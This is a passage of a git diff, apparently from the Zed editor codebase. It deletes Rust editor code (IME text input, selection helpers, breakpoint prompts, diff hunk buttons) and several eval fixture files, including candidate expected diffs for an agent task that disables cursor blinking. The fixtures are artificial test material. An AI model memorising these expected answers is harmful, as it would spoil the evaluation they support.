} => cx.theme().colors().editor_background, - }; - - EditorElement::new( - &cx.entity(), - EditorStyle { - background, - local_player: cx.theme().players().local(), - text: text_style, - scrollbar_width: EditorElement::SCROLLBAR_WIDTH, - syntax: cx.theme().syntax().clone(), - status: cx.theme().status().clone(), - inlay_hints_style: make_inlay_hints_style(cx), - inline_completion_styles: make_suggestion_styles(cx), - unnecessary_code_fade: ThemeSettings::get_global(cx).unnecessary_code_fade, - }, - ) - } -} - -impl EntityInputHandler for Editor { - fn text_for_range( - &mut self, - range_utf16: Range, - adjusted_range: &mut Option>, - _: &mut Window, - cx: &mut Context, - ) -> Option { - let snapshot = self.buffer.read(cx).read(cx); - let start = snapshot.clip_offset_utf16(OffsetUtf16(range_utf16.start), Bias::Left); - let end = snapshot.clip_offset_utf16(OffsetUtf16(range_utf16.end), Bias::Right); - if (start.0..end.0) != range_utf16 { - adjusted_range.replace(start.0..end.0); - } - Some(snapshot.text_for_range(start..end).collect()) - } - - fn selected_text_range( - &mut self, - ignore_disabled_input: bool, - _: &mut Window, - cx: &mut Context, - ) -> Option { - // Prevent the IME menu from appearing when holding down an alphabetic key - // while input is disabled. 
- if !ignore_disabled_input && !self.input_enabled { - return None; - } - - let selection = self.selections.newest::(cx); - let range = selection.range(); - - Some(UTF16Selection { - range: range.start.0..range.end.0, - reversed: selection.reversed, - }) - } - - fn marked_text_range(&self, _: &mut Window, cx: &mut Context) -> Option> { - let snapshot = self.buffer.read(cx).read(cx); - let range = self.text_highlights::(cx)?.1.first()?; - Some(range.start.to_offset_utf16(&snapshot).0..range.end.to_offset_utf16(&snapshot).0) - } - - fn unmark_text(&mut self, _: &mut Window, cx: &mut Context) { - self.clear_highlights::(cx); - self.ime_transaction.take(); - } - - fn replace_text_in_range( - &mut self, - range_utf16: Option>, - text: &str, - window: &mut Window, - cx: &mut Context, - ) { - if !self.input_enabled { - cx.emit(EditorEvent::InputIgnored { text: text.into() }); - return; - } - - self.transact(window, cx, |this, window, cx| { - let new_selected_ranges = if let Some(range_utf16) = range_utf16 { - let range_utf16 = OffsetUtf16(range_utf16.start)..OffsetUtf16(range_utf16.end); - Some(this.selection_replacement_ranges(range_utf16, cx)) - } else { - this.marked_text_ranges(cx) - }; - - let range_to_replace = new_selected_ranges.as_ref().and_then(|ranges_to_replace| { - let newest_selection_id = this.selections.newest_anchor().id; - this.selections - .all::(cx) - .iter() - .zip(ranges_to_replace.iter()) - .find_map(|(selection, range)| { - if selection.id == newest_selection_id { - Some( - (range.start.0 as isize - selection.head().0 as isize) - ..(range.end.0 as isize - selection.head().0 as isize), - ) - } else { - None - } - }) - }); - - cx.emit(EditorEvent::InputHandled { - utf16_range_to_replace: range_to_replace, - text: text.into(), - }); - - if let Some(new_selected_ranges) = new_selected_ranges { - this.change_selections(None, window, cx, |selections| { - selections.select_ranges(new_selected_ranges) - }); - this.backspace(&Default::default(), window, 
cx); - } - - this.handle_input(text, window, cx); - }); - - if let Some(transaction) = self.ime_transaction { - self.buffer.update(cx, |buffer, cx| { - buffer.group_until_transaction(transaction, cx); - }); - } - - self.unmark_text(window, cx); - } - - fn replace_and_mark_text_in_range( - &mut self, - range_utf16: Option>, - text: &str, - new_selected_range_utf16: Option>, - window: &mut Window, - cx: &mut Context, - ) { - if !self.input_enabled { - return; - } - - let transaction = self.transact(window, cx, |this, window, cx| { - let ranges_to_replace = if let Some(mut marked_ranges) = this.marked_text_ranges(cx) { - let snapshot = this.buffer.read(cx).read(cx); - if let Some(relative_range_utf16) = range_utf16.as_ref() { - for marked_range in &mut marked_ranges { - marked_range.end.0 = marked_range.start.0 + relative_range_utf16.end; - marked_range.start.0 += relative_range_utf16.start; - marked_range.start = - snapshot.clip_offset_utf16(marked_range.start, Bias::Left); - marked_range.end = - snapshot.clip_offset_utf16(marked_range.end, Bias::Right); - } - } - Some(marked_ranges) - } else if let Some(range_utf16) = range_utf16 { - let range_utf16 = OffsetUtf16(range_utf16.start)..OffsetUtf16(range_utf16.end); - Some(this.selection_replacement_ranges(range_utf16, cx)) - } else { - None - }; - - let range_to_replace = ranges_to_replace.as_ref().and_then(|ranges_to_replace| { - let newest_selection_id = this.selections.newest_anchor().id; - this.selections - .all::(cx) - .iter() - .zip(ranges_to_replace.iter()) - .find_map(|(selection, range)| { - if selection.id == newest_selection_id { - Some( - (range.start.0 as isize - selection.head().0 as isize) - ..(range.end.0 as isize - selection.head().0 as isize), - ) - } else { - None - } - }) - }); - - cx.emit(EditorEvent::InputHandled { - utf16_range_to_replace: range_to_replace, - text: text.into(), - }); - - if let Some(ranges) = ranges_to_replace { - this.change_selections(None, window, cx, |s| 
s.select_ranges(ranges)); - } - - let marked_ranges = { - let snapshot = this.buffer.read(cx).read(cx); - this.selections - .disjoint_anchors() - .iter() - .map(|selection| { - selection.start.bias_left(&snapshot)..selection.end.bias_right(&snapshot) - }) - .collect::>() - }; - - if text.is_empty() { - this.unmark_text(window, cx); - } else { - this.highlight_text::( - marked_ranges.clone(), - HighlightStyle { - underline: Some(UnderlineStyle { - thickness: px(1.), - color: None, - wavy: false, - }), - ..Default::default() - }, - cx, - ); - } - - // Disable auto-closing when composing text (i.e. typing a `"` on a Brazilian keyboard) - let use_autoclose = this.use_autoclose; - let use_auto_surround = this.use_auto_surround; - this.set_use_autoclose(false); - this.set_use_auto_surround(false); - this.handle_input(text, window, cx); - this.set_use_autoclose(use_autoclose); - this.set_use_auto_surround(use_auto_surround); - - if let Some(new_selected_range) = new_selected_range_utf16 { - let snapshot = this.buffer.read(cx).read(cx); - let new_selected_ranges = marked_ranges - .into_iter() - .map(|marked_range| { - let insertion_start = marked_range.start.to_offset_utf16(&snapshot).0; - let new_start = OffsetUtf16(new_selected_range.start + insertion_start); - let new_end = OffsetUtf16(new_selected_range.end + insertion_start); - snapshot.clip_offset_utf16(new_start, Bias::Left) - ..snapshot.clip_offset_utf16(new_end, Bias::Right) - }) - .collect::>(); - - drop(snapshot); - this.change_selections(None, window, cx, |selections| { - selections.select_ranges(new_selected_ranges) - }); - } - }); - - self.ime_transaction = self.ime_transaction.or(transaction); - if let Some(transaction) = self.ime_transaction { - self.buffer.update(cx, |buffer, cx| { - buffer.group_until_transaction(transaction, cx); - }); - } - - if self.text_highlights::(cx).is_none() { - self.ime_transaction.take(); - } - } - - fn bounds_for_range( - &mut self, - range_utf16: Range, - element_bounds: 
gpui::Bounds, - window: &mut Window, - cx: &mut Context, - ) -> Option> { - let text_layout_details = self.text_layout_details(window); - let gpui::Size { - width: em_width, - height: line_height, - } = self.character_size(window); - - let snapshot = self.snapshot(window, cx); - let scroll_position = snapshot.scroll_position(); - let scroll_left = scroll_position.x * em_width; - - let start = OffsetUtf16(range_utf16.start).to_display_point(&snapshot); - let x = snapshot.x_for_display_point(start, &text_layout_details) - scroll_left - + self.gutter_dimensions.width - + self.gutter_dimensions.margin; - let y = line_height * (start.row().as_f32() - scroll_position.y); - - Some(Bounds { - origin: element_bounds.origin + point(x, y), - size: size(em_width, line_height), - }) - } - - fn character_index_for_point( - &mut self, - point: gpui::Point, - _window: &mut Window, - _cx: &mut Context, - ) -> Option { - let position_map = self.last_position_map.as_ref()?; - if !position_map.text_hitbox.contains(&point) { - return None; - } - let display_point = position_map.point_for_position(point).previous_valid; - let anchor = position_map - .snapshot - .display_point_to_anchor(display_point, Bias::Left); - let utf16_offset = anchor.to_offset_utf16(&position_map.snapshot.buffer_snapshot); - Some(utf16_offset.0) - } -} - -trait SelectionExt { - fn display_range(&self, map: &DisplaySnapshot) -> Range; - fn spanned_rows( - &self, - include_end_if_at_line_start: bool, - map: &DisplaySnapshot, - ) -> Range; -} - -impl SelectionExt for Selection { - fn display_range(&self, map: &DisplaySnapshot) -> Range { - let start = self - .start - .to_point(&map.buffer_snapshot) - .to_display_point(map); - let end = self - .end - .to_point(&map.buffer_snapshot) - .to_display_point(map); - if self.reversed { - end..start - } else { - start..end - } - } - - fn spanned_rows( - &self, - include_end_if_at_line_start: bool, - map: &DisplaySnapshot, - ) -> Range { - let start = 
self.start.to_point(&map.buffer_snapshot); - let mut end = self.end.to_point(&map.buffer_snapshot); - if !include_end_if_at_line_start && start.row != end.row && end.column == 0 { - end.row -= 1; - } - - let buffer_start = map.prev_line_boundary(start).0; - let buffer_end = map.next_line_boundary(end).0; - MultiBufferRow(buffer_start.row)..MultiBufferRow(buffer_end.row + 1) - } -} - -impl InvalidationStack { - fn invalidate(&mut self, selections: &[Selection], buffer: &MultiBufferSnapshot) - where - S: Clone + ToOffset, - { - while let Some(region) = self.last() { - let all_selections_inside_invalidation_ranges = - if selections.len() == region.ranges().len() { - selections - .iter() - .zip(region.ranges().iter().map(|r| r.to_offset(buffer))) - .all(|(selection, invalidation_range)| { - let head = selection.head().to_offset(buffer); - invalidation_range.start <= head && invalidation_range.end >= head - }) - } else { - false - }; - - if all_selections_inside_invalidation_ranges { - break; - } else { - self.pop(); - } - } - } -} - -impl Default for InvalidationStack { - fn default() -> Self { - Self(Default::default()) - } -} - -impl Deref for InvalidationStack { - type Target = Vec; - - fn deref(&self) -> &Self::Target { - &self.0 - } -} - -impl DerefMut for InvalidationStack { - fn deref_mut(&mut self) -> &mut Self::Target { - &mut self.0 - } -} - -impl InvalidationRegion for SnippetState { - fn ranges(&self) -> &[Range] { - &self.ranges[self.active_index] - } -} - -fn inline_completion_edit_text( - current_snapshot: &BufferSnapshot, - edits: &[(Range, String)], - edit_preview: &EditPreview, - include_deletions: bool, - cx: &App, -) -> HighlightedText { - let edits = edits - .iter() - .map(|(anchor, text)| { - ( - anchor.start.text_anchor..anchor.end.text_anchor, - text.clone(), - ) - }) - .collect::>(); - - edit_preview.highlight_edits(current_snapshot, &edits, include_deletions, cx) -} - -pub fn diagnostic_style(severity: DiagnosticSeverity, colors: 
&StatusColors) -> Hsla { - match severity { - DiagnosticSeverity::ERROR => colors.error, - DiagnosticSeverity::WARNING => colors.warning, - DiagnosticSeverity::INFORMATION => colors.info, - DiagnosticSeverity::HINT => colors.info, - _ => colors.ignored, - } -} - -pub fn styled_runs_for_code_label<'a>( - label: &'a CodeLabel, - syntax_theme: &'a theme::SyntaxTheme, -) -> impl 'a + Iterator, HighlightStyle)> { - let fade_out = HighlightStyle { - fade_out: Some(0.35), - ..Default::default() - }; - - let mut prev_end = label.filter_range.end; - label - .runs - .iter() - .enumerate() - .flat_map(move |(ix, (range, highlight_id))| { - let style = if let Some(style) = highlight_id.style(syntax_theme) { - style - } else { - return Default::default(); - }; - let mut muted_style = style; - muted_style.highlight(fade_out); - - let mut runs = SmallVec::<[(Range, HighlightStyle); 3]>::new(); - if range.start >= label.filter_range.end { - if range.start > prev_end { - runs.push((prev_end..range.start, fade_out)); - } - runs.push((range.clone(), muted_style)); - } else if range.end <= label.filter_range.end { - runs.push((range.clone(), style)); - } else { - runs.push((range.start..label.filter_range.end, style)); - runs.push((label.filter_range.end..range.end, muted_style)); - } - prev_end = cmp::max(prev_end, range.end); - - if ix + 1 == label.runs.len() && label.text.len() > prev_end { - runs.push((prev_end..label.text.len(), fade_out)); - } - - runs - }) -} - -pub(crate) fn split_words(text: &str) -> impl std::iter::Iterator + '_ { - let mut prev_index = 0; - let mut prev_codepoint: Option = None; - text.char_indices() - .chain([(text.len(), '\0')]) - .filter_map(move |(index, codepoint)| { - let prev_codepoint = prev_codepoint.replace(codepoint)?; - let is_boundary = index == text.len() - || !prev_codepoint.is_uppercase() && codepoint.is_uppercase() - || !prev_codepoint.is_alphanumeric() && codepoint.is_alphanumeric(); - if is_boundary { - let chunk = 
&text[prev_index..index]; - prev_index = index; - Some(chunk) - } else { - None - } - }) -} - -pub trait RangeToAnchorExt: Sized { - fn to_anchors(self, snapshot: &MultiBufferSnapshot) -> Range; - - fn to_display_points(self, snapshot: &EditorSnapshot) -> Range { - let anchor_range = self.to_anchors(&snapshot.buffer_snapshot); - anchor_range.start.to_display_point(snapshot)..anchor_range.end.to_display_point(snapshot) - } -} - -impl RangeToAnchorExt for Range { - fn to_anchors(self, snapshot: &MultiBufferSnapshot) -> Range { - let start_offset = self.start.to_offset(snapshot); - let end_offset = self.end.to_offset(snapshot); - if start_offset == end_offset { - snapshot.anchor_before(start_offset)..snapshot.anchor_before(end_offset) - } else { - snapshot.anchor_after(self.start)..snapshot.anchor_before(self.end) - } - } -} - -pub trait RowExt { - fn as_f32(&self) -> f32; - - fn next_row(&self) -> Self; - - fn previous_row(&self) -> Self; - - fn minus(&self, other: Self) -> u32; -} - -impl RowExt for DisplayRow { - fn as_f32(&self) -> f32 { - self.0 as f32 - } - - fn next_row(&self) -> Self { - Self(self.0 + 1) - } - - fn previous_row(&self) -> Self { - Self(self.0.saturating_sub(1)) - } - - fn minus(&self, other: Self) -> u32 { - self.0 - other.0 - } -} - -impl RowExt for MultiBufferRow { - fn as_f32(&self) -> f32 { - self.0 as f32 - } - - fn next_row(&self) -> Self { - Self(self.0 + 1) - } - - fn previous_row(&self) -> Self { - Self(self.0.saturating_sub(1)) - } - - fn minus(&self, other: Self) -> u32 { - self.0 - other.0 - } -} - -trait RowRangeExt { - type Row; - - fn len(&self) -> usize; - - fn iter_rows(&self) -> impl DoubleEndedIterator; -} - -impl RowRangeExt for Range { - type Row = MultiBufferRow; - - fn len(&self) -> usize { - (self.end.0 - self.start.0) as usize - } - - fn iter_rows(&self) -> impl DoubleEndedIterator { - (self.start.0..self.end.0).map(MultiBufferRow) - } -} - -impl RowRangeExt for Range { - type Row = DisplayRow; - - fn len(&self) -> 
usize { - (self.end.0 - self.start.0) as usize - } - - fn iter_rows(&self) -> impl DoubleEndedIterator { - (self.start.0..self.end.0).map(DisplayRow) - } -} - -/// If select range has more than one line, we -/// just point the cursor to range.start. -fn collapse_multiline_range(range: Range) -> Range { - if range.start.row == range.end.row { - range - } else { - range.start..range.start - } -} -pub struct KillRing(ClipboardItem); -impl Global for KillRing {} - -const UPDATE_DEBOUNCE: Duration = Duration::from_millis(50); - -enum BreakpointPromptEditAction { - Log, - Condition, - HitCondition, -} - -struct BreakpointPromptEditor { - pub(crate) prompt: Entity, - editor: WeakEntity, - breakpoint_anchor: Anchor, - breakpoint: Breakpoint, - edit_action: BreakpointPromptEditAction, - block_ids: HashSet, - gutter_dimensions: Arc>, - _subscriptions: Vec, -} - -impl BreakpointPromptEditor { - const MAX_LINES: u8 = 4; - - fn new( - editor: WeakEntity, - breakpoint_anchor: Anchor, - breakpoint: Breakpoint, - edit_action: BreakpointPromptEditAction, - window: &mut Window, - cx: &mut Context, - ) -> Self { - let base_text = match edit_action { - BreakpointPromptEditAction::Log => breakpoint.message.as_ref(), - BreakpointPromptEditAction::Condition => breakpoint.condition.as_ref(), - BreakpointPromptEditAction::HitCondition => breakpoint.hit_condition.as_ref(), - } - .map(|msg| msg.to_string()) - .unwrap_or_default(); - - let buffer = cx.new(|cx| Buffer::local(base_text, cx)); - let buffer = cx.new(|cx| MultiBuffer::singleton(buffer, cx)); - - let prompt = cx.new(|cx| { - let mut prompt = Editor::new( - EditorMode::AutoHeight { - max_lines: Self::MAX_LINES as usize, - }, - buffer, - None, - window, - cx, - ); - prompt.set_soft_wrap_mode(language::language_settings::SoftWrap::EditorWidth, cx); - prompt.set_show_cursor_when_unfocused(false, cx); - prompt.set_placeholder_text( - match edit_action { - BreakpointPromptEditAction::Log => "Message to log when a breakpoint is hit. 
Expressions within {} are interpolated.", - BreakpointPromptEditAction::Condition => "Condition when a breakpoint is hit. Expressions within {} are interpolated.", - BreakpointPromptEditAction::HitCondition => "How many breakpoint hits to ignore", - }, - cx, - ); - - prompt - }); - - Self { - prompt, - editor, - breakpoint_anchor, - breakpoint, - edit_action, - gutter_dimensions: Arc::new(Mutex::new(GutterDimensions::default())), - block_ids: Default::default(), - _subscriptions: vec![], - } - } - - pub(crate) fn add_block_ids(&mut self, block_ids: Vec) { - self.block_ids.extend(block_ids) - } - - fn confirm(&mut self, _: &menu::Confirm, window: &mut Window, cx: &mut Context) { - if let Some(editor) = self.editor.upgrade() { - let message = self - .prompt - .read(cx) - .buffer - .read(cx) - .as_singleton() - .expect("A multi buffer in breakpoint prompt isn't possible") - .read(cx) - .as_rope() - .to_string(); - - editor.update(cx, |editor, cx| { - editor.edit_breakpoint_at_anchor( - self.breakpoint_anchor, - self.breakpoint.clone(), - match self.edit_action { - BreakpointPromptEditAction::Log => { - BreakpointEditAction::EditLogMessage(message.into()) - } - BreakpointPromptEditAction::Condition => { - BreakpointEditAction::EditCondition(message.into()) - } - BreakpointPromptEditAction::HitCondition => { - BreakpointEditAction::EditHitCondition(message.into()) - } - }, - cx, - ); - - editor.remove_blocks(self.block_ids.clone(), None, cx); - cx.focus_self(window); - }); - } - } - - fn cancel(&mut self, _: &menu::Cancel, window: &mut Window, cx: &mut Context) { - self.editor - .update(cx, |editor, cx| { - editor.remove_blocks(self.block_ids.clone(), None, cx); - window.focus(&editor.focus_handle); - }) - .log_err(); - } - - fn render_prompt_editor(&self, cx: &mut Context) -> impl IntoElement { - let settings = ThemeSettings::get_global(cx); - let text_style = TextStyle { - color: if self.prompt.read(cx).read_only(cx) { - cx.theme().colors().text_disabled - } else { - 
cx.theme().colors().text - }, - font_family: settings.buffer_font.family.clone(), - font_fallbacks: settings.buffer_font.fallbacks.clone(), - font_size: settings.buffer_font_size(cx).into(), - font_weight: settings.buffer_font.weight, - line_height: relative(settings.buffer_line_height.value()), - ..Default::default() - }; - EditorElement::new( - &self.prompt, - EditorStyle { - background: cx.theme().colors().editor_background, - local_player: cx.theme().players().local(), - text: text_style, - ..Default::default() - }, - ) - } -} - -impl Render for BreakpointPromptEditor { - fn render(&mut self, window: &mut Window, cx: &mut Context) -> impl IntoElement { - let gutter_dimensions = *self.gutter_dimensions.lock(); - h_flex() - .key_context("Editor") - .bg(cx.theme().colors().editor_background) - .border_y_1() - .border_color(cx.theme().status().info_border) - .size_full() - .py(window.line_height() / 2.5) - .on_action(cx.listener(Self::confirm)) - .on_action(cx.listener(Self::cancel)) - .child(h_flex().w(gutter_dimensions.full_width() + (gutter_dimensions.margin / 2.0))) - .child(div().flex_1().child(self.render_prompt_editor(cx))) - } -} - -impl Focusable for BreakpointPromptEditor { - fn focus_handle(&self, cx: &App) -> FocusHandle { - self.prompt.focus_handle(cx) - } -} - -fn all_edits_insertions_or_deletions( - edits: &Vec<(Range, String)>, - snapshot: &MultiBufferSnapshot, -) -> bool { - let mut all_insertions = true; - let mut all_deletions = true; - - for (range, new_text) in edits.iter() { - let range_is_empty = range.to_offset(&snapshot).is_empty(); - let text_is_empty = new_text.is_empty(); - - if range_is_empty != text_is_empty { - if range_is_empty { - all_deletions = false; - } else { - all_insertions = false; - } - } else { - return false; - } - - if !all_insertions && !all_deletions { - return false; - } - } - all_insertions || all_deletions -} - -struct MissingEditPredictionKeybindingTooltip; - -impl Render for MissingEditPredictionKeybindingTooltip 
{ - fn render(&mut self, window: &mut Window, cx: &mut Context) -> impl IntoElement { - ui::tooltip_container(window, cx, |container, _, cx| { - container - .flex_shrink_0() - .max_w_80() - .min_h(rems_from_px(124.)) - .justify_between() - .child( - v_flex() - .flex_1() - .text_ui_sm(cx) - .child(Label::new("Conflict with Accept Keybinding")) - .child("Your keymap currently overrides the default accept keybinding. To continue, assign one keybinding for the `editor::AcceptEditPrediction` action.") - ) - .child( - h_flex() - .pb_1() - .gap_1() - .items_end() - .w_full() - .child(Button::new("open-keymap", "Assign Keybinding").size(ButtonSize::Compact).on_click(|_ev, window, cx| { - window.dispatch_action(zed_actions::OpenKeymap.boxed_clone(), cx) - })) - .child(Button::new("see-docs", "See Docs").size(ButtonSize::Compact).on_click(|_ev, _window, cx| { - cx.open_url("https://zed.dev/docs/completions#edit-predictions-missing-keybinding"); - })), - ) - }) - } -} - -#[derive(Debug, Clone, Copy, PartialEq)] -pub struct LineHighlight { - pub background: Background, - pub border: Option, - pub include_gutter: bool, - pub type_id: Option, -} - -fn render_diff_hunk_controls( - row: u32, - status: &DiffHunkStatus, - hunk_range: Range, - is_created_file: bool, - line_height: Pixels, - editor: &Entity, - _window: &mut Window, - cx: &mut App, -) -> AnyElement { - h_flex() - .h(line_height) - .mr_1() - .gap_1() - .px_0p5() - .pb_1() - .border_x_1() - .border_b_1() - .border_color(cx.theme().colors().border_variant) - .rounded_b_lg() - .bg(cx.theme().colors().editor_background) - .gap_1() - .occlude() - .shadow_md() - .child(if status.has_secondary_hunk() { - Button::new(("stage", row as u64), "Stage") - .alpha(if status.is_pending() { 0.66 } else { 1.0 }) - .tooltip({ - let focus_handle = editor.focus_handle(cx); - move |window, cx| { - Tooltip::for_action_in( - "Stage Hunk", - &::git::ToggleStaged, - &focus_handle, - window, - cx, - ) - } - }) - .on_click({ - let editor = 
editor.clone(); - move |_event, _window, cx| { - editor.update(cx, |editor, cx| { - editor.stage_or_unstage_diff_hunks( - true, - vec![hunk_range.start..hunk_range.start], - cx, - ); - }); - } - }) - } else { - Button::new(("unstage", row as u64), "Unstage") - .alpha(if status.is_pending() { 0.66 } else { 1.0 }) - .tooltip({ - let focus_handle = editor.focus_handle(cx); - move |window, cx| { - Tooltip::for_action_in( - "Unstage Hunk", - &::git::ToggleStaged, - &focus_handle, - window, - cx, - ) - } - }) - .on_click({ - let editor = editor.clone(); - move |_event, _window, cx| { - editor.update(cx, |editor, cx| { - editor.stage_or_unstage_diff_hunks( - false, - vec![hunk_range.start..hunk_range.start], - cx, - ); - }); - } - }) - }) - .child( - Button::new(("restore", row as u64), "Restore") - .tooltip({ - let focus_handle = editor.focus_handle(cx); - move |window, cx| { - Tooltip::for_action_in( - "Restore Hunk", - &::git::Restore, - &focus_handle, - window, - cx, - ) - } - }) - .on_click({ - let editor = editor.clone(); - move |_event, window, cx| { - editor.update(cx, |editor, cx| { - let snapshot = editor.snapshot(window, cx); - let point = hunk_range.start.to_point(&snapshot.buffer_snapshot); - editor.restore_hunks_in_ranges(vec![point..point], window, cx); - }); - } - }) - .disabled(is_created_file), - ) - .when( - !editor.read(cx).buffer().read(cx).all_diff_hunks_expanded(), - |el| { - el.child( - IconButton::new(("next-hunk", row as u64), IconName::ArrowDown) - .shape(IconButtonShape::Square) - .icon_size(IconSize::Small) - // .disabled(!has_multiple_hunks) - .tooltip({ - let focus_handle = editor.focus_handle(cx); - move |window, cx| { - Tooltip::for_action_in( - "Next Hunk", - &GoToHunk, - &focus_handle, - window, - cx, - ) - } - }) - .on_click({ - let editor = editor.clone(); - move |_event, window, cx| { - editor.update(cx, |editor, cx| { - let snapshot = editor.snapshot(window, cx); - let position = - hunk_range.end.to_point(&snapshot.buffer_snapshot); 
- editor.go_to_hunk_before_or_after_position( - &snapshot, - position, - Direction::Next, - window, - cx, - ); - editor.expand_selected_diff_hunks(cx); - }); - } - }), - ) - .child( - IconButton::new(("prev-hunk", row as u64), IconName::ArrowUp) - .shape(IconButtonShape::Square) - .icon_size(IconSize::Small) - // .disabled(!has_multiple_hunks) - .tooltip({ - let focus_handle = editor.focus_handle(cx); - move |window, cx| { - Tooltip::for_action_in( - "Previous Hunk", - &GoToPreviousHunk, - &focus_handle, - window, - cx, - ) - } - }) - .on_click({ - let editor = editor.clone(); - move |_event, window, cx| { - editor.update(cx, |editor, cx| { - let snapshot = editor.snapshot(window, cx); - let point = - hunk_range.start.to_point(&snapshot.buffer_snapshot); - editor.go_to_hunk_before_or_after_position( - &snapshot, - point, - Direction::Prev, - window, - cx, - ); - editor.expand_selected_diff_hunks(cx); - }); - } - }), - ) - }, - ) - .into_any_element() -} diff --git a/crates/agent/src/edit_agent/evals/fixtures/disable_cursor_blinking/possible-01.diff b/crates/agent/src/edit_agent/evals/fixtures/disable_cursor_blinking/possible-01.diff deleted file mode 100644 index 1a38a1967f94c9..00000000000000 --- a/crates/agent/src/edit_agent/evals/fixtures/disable_cursor_blinking/possible-01.diff +++ /dev/null @@ -1,28 +0,0 @@ ---- before.rs 2025-07-07 11:37:48.434629001 +0300 -+++ expected.rs 2025-07-14 10:33:53.346906775 +0300 -@@ -1780,11 +1780,11 @@ - cx.observe_window_activation(window, |editor, window, cx| { - let active = window.is_window_active(); - editor.blink_manager.update(cx, |blink_manager, cx| { -- if active { -- blink_manager.enable(cx); -- } else { -- blink_manager.disable(cx); -- } -+ // if active { -+ // blink_manager.enable(cx); -+ // } else { -+ // blink_manager.disable(cx); -+ // } - }); - }), - ], -@@ -18463,7 +18463,7 @@ - } - - self.blink_manager.update(cx, |blink_manager, cx| { -- blink_manager.enable(cx); -+ // blink_manager.enable(cx); - }); - 
self.show_cursor_names(window, cx); - self.buffer.update(cx, |buffer, cx| { diff --git a/crates/agent/src/edit_agent/evals/fixtures/disable_cursor_blinking/possible-02.diff b/crates/agent/src/edit_agent/evals/fixtures/disable_cursor_blinking/possible-02.diff deleted file mode 100644 index b484cce48f71b2..00000000000000 --- a/crates/agent/src/edit_agent/evals/fixtures/disable_cursor_blinking/possible-02.diff +++ /dev/null @@ -1,29 +0,0 @@ -@@ -1778,13 +1778,13 @@ - cx.observe_global_in::(window, Self::settings_changed), - observe_buffer_font_size_adjustment(cx, |_, cx| cx.notify()), - cx.observe_window_activation(window, |editor, window, cx| { -- let active = window.is_window_active(); -+ // let active = window.is_window_active(); - editor.blink_manager.update(cx, |blink_manager, cx| { -- if active { -- blink_manager.enable(cx); -- } else { -- blink_manager.disable(cx); -- } -+ // if active { -+ // blink_manager.enable(cx); -+ // } else { -+ // blink_manager.disable(cx); -+ // } - }); - }), - ], -@@ -18463,7 +18463,7 @@ - } - - self.blink_manager.update(cx, |blink_manager, cx| { -- blink_manager.enable(cx); -+ // blink_manager.enable(cx); - }); - self.show_cursor_names(window, cx); - self.buffer.update(cx, |buffer, cx| { diff --git a/crates/agent/src/edit_agent/evals/fixtures/disable_cursor_blinking/possible-03.diff b/crates/agent/src/edit_agent/evals/fixtures/disable_cursor_blinking/possible-03.diff deleted file mode 100644 index 431e34e48a250b..00000000000000 --- a/crates/agent/src/edit_agent/evals/fixtures/disable_cursor_blinking/possible-03.diff +++ /dev/null @@ -1,34 +0,0 @@ -@@ -1774,17 +1774,17 @@ - cx.observe(&buffer, Self::on_buffer_changed), - cx.subscribe_in(&buffer, window, Self::on_buffer_event), - cx.observe_in(&display_map, window, Self::on_display_map_changed), -- cx.observe(&blink_manager, |_, _, cx| cx.notify()), -+ // cx.observe(&blink_manager, |_, _, cx| cx.notify()), - cx.observe_global_in::(window, Self::settings_changed), - 
observe_buffer_font_size_adjustment(cx, |_, cx| cx.notify()), - cx.observe_window_activation(window, |editor, window, cx| { -- let active = window.is_window_active(); -+ // let active = window.is_window_active(); - editor.blink_manager.update(cx, |blink_manager, cx| { -- if active { -- blink_manager.enable(cx); -- } else { -- blink_manager.disable(cx); -- } -+ // if active { -+ // blink_manager.enable(cx); -+ // } else { -+ // blink_manager.disable(cx); -+ // } - }); - }), - ], -@@ -18463,7 +18463,7 @@ - } - - self.blink_manager.update(cx, |blink_manager, cx| { -- blink_manager.enable(cx); -+ // blink_manager.enable(cx); - }); - self.show_cursor_names(window, cx); - self.buffer.update(cx, |buffer, cx| { diff --git a/crates/agent/src/edit_agent/evals/fixtures/disable_cursor_blinking/possible-04.diff b/crates/agent/src/edit_agent/evals/fixtures/disable_cursor_blinking/possible-04.diff deleted file mode 100644 index 64a6b85dd37514..00000000000000 --- a/crates/agent/src/edit_agent/evals/fixtures/disable_cursor_blinking/possible-04.diff +++ /dev/null @@ -1,33 +0,0 @@ -@@ -1774,17 +1774,17 @@ - cx.observe(&buffer, Self::on_buffer_changed), - cx.subscribe_in(&buffer, window, Self::on_buffer_event), - cx.observe_in(&display_map, window, Self::on_display_map_changed), -- cx.observe(&blink_manager, |_, _, cx| cx.notify()), -+ // cx.observe(&blink_manager, |_, _, cx| cx.notify()), - cx.observe_global_in::(window, Self::settings_changed), - observe_buffer_font_size_adjustment(cx, |_, cx| cx.notify()), - cx.observe_window_activation(window, |editor, window, cx| { - let active = window.is_window_active(); - editor.blink_manager.update(cx, |blink_manager, cx| { -- if active { -- blink_manager.enable(cx); -- } else { -- blink_manager.disable(cx); -- } -+ // if active { -+ // blink_manager.enable(cx); -+ // } else { -+ // blink_manager.disable(cx); -+ // } - }); - }), - ], -@@ -18463,7 +18463,7 @@ - } - - self.blink_manager.update(cx, |blink_manager, cx| { -- 
blink_manager.enable(cx); -+ // blink_manager.enable(cx); - }); - self.show_cursor_names(window, cx); - self.buffer.update(cx, |buffer, cx| { diff --git a/crates/agent/src/edit_agent/evals/fixtures/extract_handle_command_output/before.rs b/crates/agent/src/edit_agent/evals/fixtures/extract_handle_command_output/before.rs deleted file mode 100644 index 36fccb51327126..00000000000000 --- a/crates/agent/src/edit_agent/evals/fixtures/extract_handle_command_output/before.rs +++ /dev/null @@ -1,371 +0,0 @@ -use crate::commit::get_messages; -use crate::{GitRemote, Oid}; -use anyhow::{Context as _, Result, anyhow}; -use collections::{HashMap, HashSet}; -use futures::AsyncWriteExt; -use gpui::SharedString; -use serde::{Deserialize, Serialize}; -use std::process::Stdio; -use std::{ops::Range, path::Path}; -use text::Rope; -use time::OffsetDateTime; -use time::UtcOffset; -use time::macros::format_description; - -pub use git2 as libgit; - -#[derive(Debug, Clone, Default)] -pub struct Blame { - pub entries: Vec, - pub messages: HashMap, - pub remote_url: Option, -} - -#[derive(Clone, Debug, Default)] -pub struct ParsedCommitMessage { - pub message: SharedString, - pub permalink: Option, - pub pull_request: Option, - pub remote: Option, -} - -impl Blame { - pub async fn for_path( - git_binary: &Path, - working_directory: &Path, - path: &Path, - content: &Rope, - remote_url: Option, - ) -> Result { - let output = run_git_blame(git_binary, working_directory, path, content).await?; - let mut entries = parse_git_blame(&output)?; - entries.sort_unstable_by(|a, b| a.range.start.cmp(&b.range.start)); - - let mut 